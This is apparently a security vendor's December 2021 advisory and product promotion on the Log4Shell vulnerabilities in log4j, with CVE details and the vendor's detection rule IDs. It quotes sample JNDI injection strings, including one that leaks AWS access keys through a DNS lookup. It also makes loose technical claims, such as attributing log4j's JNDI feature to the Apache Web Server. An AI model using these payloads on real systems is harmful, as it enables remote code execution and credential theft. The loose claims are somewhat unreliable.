Hsinchu, Taiwan – Dec 19, 2021 – One of the Apache Log4shell Vulnerabilities has the CVSS score as 10. The full score of CVSS is 10 and thus this is the highest level critical. Its name is CVE-2021-44228 and means that the JNDI feature of Apache Web Server used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. Apache organization fixed it and released log4j2 version 2.15. And then, CVE-2021-45046 is found in version 2.15 soon and therefore version 2.16 is released. Again, CVE-2021-45105 is found in version 2.16 soon and 2.17 is released.

Also, CVE-2021-4104 is the vulnerability in log4j version 1.2. Although log4j version 1 is end of life already, some people may still use it and not upgrade to version 2.

CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 have some other names like log4j, log4j2, log4shell and so on. Actually log4j and log4j2 are the very popular logging tools maintained by Apache organization for sending text to be stored in log files and/or databases. The log4j (version 1) is end of life and log4j2 (version 2) is the latest. Log4shell is the more precise name for these vulnerabilities because cyber-criminals can execute remote code easily with those vulnerabilities. Whether you are using log4j version 1 or 2, you are strongly recommended to adopt the latest version of log4j2 for security reasons. At the time of writing, the version 2.17 is the latest version.

Update: The CVSS score of CVE-2021-45046 is adjusted from 3.7 to 9 on Dec 17, 2021. And another CVE-2021-45105 is found that it can be used in DoS (Denial of Service) attack.

CVE Id CVE Description CVSS v3 Score Severity Level Affected log4j Versions
CVE-2021-44228 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 10.0 Critical Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. 9.0 Critical Log4j2 2.15 only
CVE-2021-45105 Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. 7.5 High Log4j2 versions 2.0-alpha1 through 2.16.
CVE-2021-4104 JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. N/A N/A Log4j 1.2 only.

 

According to the technical report of Rapid7, many cyber-criminals in the world begin using these vulnerabilities since November, 2021.


From the technical report of Rapid7

Log4shell Behavior

CVE-2021-44228 allows an attacker to craft an LDAP request that can retrieve and run payloads on a vulnerable host. In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form “${prefix:name}”. The example is “${jndi:ldap://example.com/file}” will load data from “ldap://example.com/file” if connected to the Internet and cyber-criminal has prepared a malicious LDAP server at “example.com”.

This vulnerability also allows information leakage where the attacker can read and show data from files and environment variables on the vulnerable host using an LDAP request. Such LDAP requests can generate a DNS request leaking sensitive information for applications such as AWS, Hadoop, Postgres etc.

An example of the format of a JNDI lookup that generates an LDAP request resulting in a DNS request leaking the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY values:

${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.}

There are a lot of real examples about log4shell. The first one is the YouTube video of cracking the popular Minecraft game via Log4shell vulnerability from IKteam. And the second one is the cracked Tesla car via Log4shell vulnerability from ExploitWareLabs.


From IKTeam, Minecraft cracked via Log4shell vulnerability

From ExploitWareLabs, Tesla cracked via Log4shell vulnerability

Lionic’s Anti-Intrusion and Anti-Virus rules for Log4shell Vulnerabilities

Again, Lionic studied the log4shell vulnerabilities immediately and released related signature. Both Anti-Intrusion and Anti-Virus signature databases have some rules which can defend against the log4shell vulnerabilities. All Lionic security technology based products can protect against log4shell vulnerabilities after their signatures are updated to the latest version.

The following two YouTube videos prove that Lionic Pico-UTM can block the log4shell vulnerabilities.

Lionic's Log4shell demo without Pico-UTM (The attack occurred.)
Lionic's Log4shell demo with Pico-UTM (The attack is blocked.)

Partial list of Anti-Intrusion rules for Log4shell Vulnerabilities:

Rule ID Description
8100903 ~ 8100908 Apache Log4j JNDI Injection Remote Code Execution attempt

Partial list of Anti-Virus rules for Log4shell Vulnerabilities:

Rule ID Virus Name Release Date
9114807219854095 Trojan.HTML.Generic.4 2021-12-16
9093020794585558 Trojan.Java.Agent.4 2021-12-16
9189618224015584 Trojan.Script.Zojfor.4 2021-12-16
9235690281452323 Trojan.Script.Zojfor.4 2021-12-16
9008999622847201 Trojan.Script.Zojfor.4 2021-12-16
9191827434065719 Trojan.Script.Zojfor.4 2021-12-16
9033340405765520 Trojan.Script.Zojfor.4 2021-12-16
9067928544323220 Trojan.Script.Zojfor.4 2021-12-16
9146325989646571 Trojan.Script.Zojfor.4 2021-12-16
9259682338799974 Trojan.Script.Zojfor.4 2021-12-16
9014239844713955 Trojan.ZIP.Zojfor.4 2021-12-16
9119691314816421 Trojan.Java.Agent.3 2021-12-16
9040875976256033 Trojan.Java.Agent.4 2021-12-15
9242430171087494 Trojan.Script.Generic.4 2021-12-15
9211518412509961 Riskware.ZIP.Generic.1 2021-12-15
9159737756054731 Trojan.Script.Generic.4 2021-12-14
9046580433934920 Trojan.Script.Zojfor.4 2021-12-14
9151855514369988 Trojan.Script.Zojfor.4 2021-12-14

 

Conclusion

Plenty of companies adopted Apache Web Server, Tomcat and are running many Java programs. Undoubtedly they are also using log4j2 as the logging tool. Therefore, many big companies like Amazon AWS, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, Cisco, NetApp and others issued the log4shell warnings to their customers. The companies adopted log4j2 are strongly recommended to upgrade their log4j2 to version 2.17 or later for defending against CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104. This is the best method for pulling the plug.

However, if network administrators are tired of fixing the endless stream of cybersecurity vulnerabilities, they can use the Lionic Pico-UTM as the “Virtual Bug Fix”. The administrators can take their time to wait the stable version and then upgrade. Also, please note that some security network appliances have Anti-Intrusion feature only and no Anti-virus feature. Both the Anti-Intrusion rules and Anti-Virus rules released by Lionic proved that only Anti-Intrusion feature is not enough for protection once again.

 

References:

  1. Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
  2. CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
  3. CVE-2021-45046, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
  4. CVE-2021-45105, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
  5. CVE-2021-4104, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104
  6. Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns, https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
  7. Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations, https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/
  8. The Every person’s Guide to Log4Shell, (CVE-2021-44228), https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/
  9. ExploitWareLabs, https://www.facebook.com/ExWareLabs
  10. Log4Shell, https://en.wikipedia.org/wiki/Log4Shell
  11. Apache Log4j Security Vulnerabilities, https://logging.apache.org/log4j/2.x/security.html

 

About Lionic Corporation

Lionic Corporation is a worldwide provider of innovative Deep Packet Inspection solutions. The technologies of Lionic include the complete DPI-based software engine and related management software which offer the Security Solutions that addresses anti-virus, anti-intrusion, anti-webthreat; and the Content Management Solutions that addresses application identification, device identification, application based QoS, web content filtering, parental control.

Lionic’s security and content management solutions, cloud-based scan services and signature subscription service are widely deployed in the world already. They help service providers, network appliance manufacturers, semiconductor companies, etc. to enable the next generation of business routers, residential gateways, SD WAN edges and cloud gateways, advanced firewalls, UTMs, Smart NICs and mobile devices. Those products powered by Lionic provide better network management and protect the world’s networks from an ever increasing level of security threats.